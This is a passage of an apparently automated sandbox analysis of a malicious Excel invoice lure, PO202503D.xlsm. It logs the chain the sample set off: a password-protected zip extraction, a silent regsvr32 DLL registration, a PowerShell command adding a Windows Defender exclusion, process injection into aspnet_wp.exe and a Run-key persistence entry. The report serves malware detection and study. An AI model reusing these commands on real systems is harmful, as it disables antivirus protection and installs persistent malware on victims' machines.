                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400158F0 CoCreateInstance,16_2_00000001400158F0
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO202503D.xlsmJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2064:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeMutant created: \Sessions\1\BaseNamedObjects\{D07CA115-8673-43EE-BE20-82EE6E12ECD2}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeMutant created: \Sessions\1\BaseNamedObjects\{46C50A8D-10E4-41E2-836F-54C9A61C5C72}
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeMutant created: \Sessions\1\BaseNamedObjects\{DC23756C-1FD1-4CE9-BD12-02B965019D31}
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeMutant created: \Sessions\1\BaseNamedObjects\{1EBCA0EE-1DEE-485D-B8FB-8CD5A107F286}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8416:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeMutant created: \Sessions\1\BaseNamedObjects\{12072879-EF3A-4BDB-9E3A-DF4639F62493}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3E33BBE1-1DC3-48B6-BA0E-8EA0D6D99267} - OProcSessId.datJump to behavior
                          Source: PO202503D.xlsmOLE indicator, Workbook stream: true
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Program Files\7-Zip\7z.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: PO202503D.xlsmVirustotal: Detection: 19%
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip"
                          Source: C:\Program Files\7-Zip\7z.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip"Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
                          Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: libcares-2.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: icu.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: msvcp290.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: libcares-2.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: msvcp290.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: icu.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msi.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winmm.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: secur32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: libcares-2.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: msvcp290.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: icu.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msi.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winmm.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: secur32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: ~DFE94CD9633EB51867.TMP.0.drInitial sample: OLE indicators vbamacros = False

                          Data Obfuscation

                          barindex
                          Document contains an embedded VBA with many string operations indicating source code obfuscation
                          Source: PO202503D.xlsmStream path 'VBA/Module2' : High number of string operations
                          Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Module2Name: Module2
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A8700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,12_2_00007FF6220A8700
                          Source: libcares-2.dll.9.drStatic PE information: section name: _RDATA
                          Source: PO202502DAKE.exe.9.drStatic PE information: section name: .xdata
                          Source: libcares-2.dll.12.drStatic PE information: section name: _RDATA
                          Source: PO202502DAKE.exe.12.drStatic PE information: section name: .xdata
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA1D57 push rbx; ret 12_2_00007FFC9CEA1D5A
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA177F push E8001D6Fh; ret 12_2_00007FFC9CEA1789
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CED8BA8 push rdx; retf 12_2_00007FFC9CED8BAB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFC3C5FD2A5 pushad ; iretd 14_2_00007FFC3C5FD2A6
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_00000001400397FB push rsp; ret 16_2_0000000140039802
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003E92B push rsp; ret 16_2_000000014003E932
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003E9FB push rsp; ret 16_2_000000014003EA02
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003EB53 push rsp; ret 16_2_000000014003EB5A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003BB8B push rsp; ret 16_2_000000014003BB92
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140039BB3 push rsp; ret 16_2_0000000140039BBA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003EC13 push rsp; ret 16_2_000000014003EC1A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003A42B push rsp; ret 16_2_000000014003A432
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140039C63 push rsp; ret 16_2_0000000140039C6A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003947B push rsp; ret 16_2_0000000140039482
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003ECD3 push rsp; ret 16_2_000000014003ECDA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003E4DB push rsp; ret 16_2_000000014003E4E2
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003A51B push rsp; ret 16_2_000000014003A522
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003BD3B push rsp; ret 16_2_000000014003BD42
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003ED83 push rsp; ret 16_2_000000014003ED8A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003958B push rsp; ret 16_2_0000000140039592
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_0000000140039DCB push rsp; ret 16_2_0000000140039DD2
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003BDF3 push rsp; ret 16_2_000000014003BDFA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003E703 push rsp; ret 16_2_000000014003E70A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003EF53 push rsp; ret 16_2_000000014003EF5A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014003E7DB push rsp; ret 16_2_000000014003E7E2
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF1D57 push rbx; ret 28_2_00007FFC9CDF1D5A
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDF177F push E8001D6Fh; ret 28_2_00007FFC9CDF1789
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE28BA8 push rdx; retf 28_2_00007FFC9CE28BAB
                          Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeFile created: C:\Users\user\SystemRootDoc\msvcp290.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeFile created: C:\Users\user\SystemRootDoc\libcares-2.dllJump to dropped file
                          Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dllJump to dropped file
                          Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\libcares-2.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeFile created: C:\Users\user\SystemRootDoc\PO202502DAKE.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PO202502DAKEJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PO202502DAKEJump to behavior

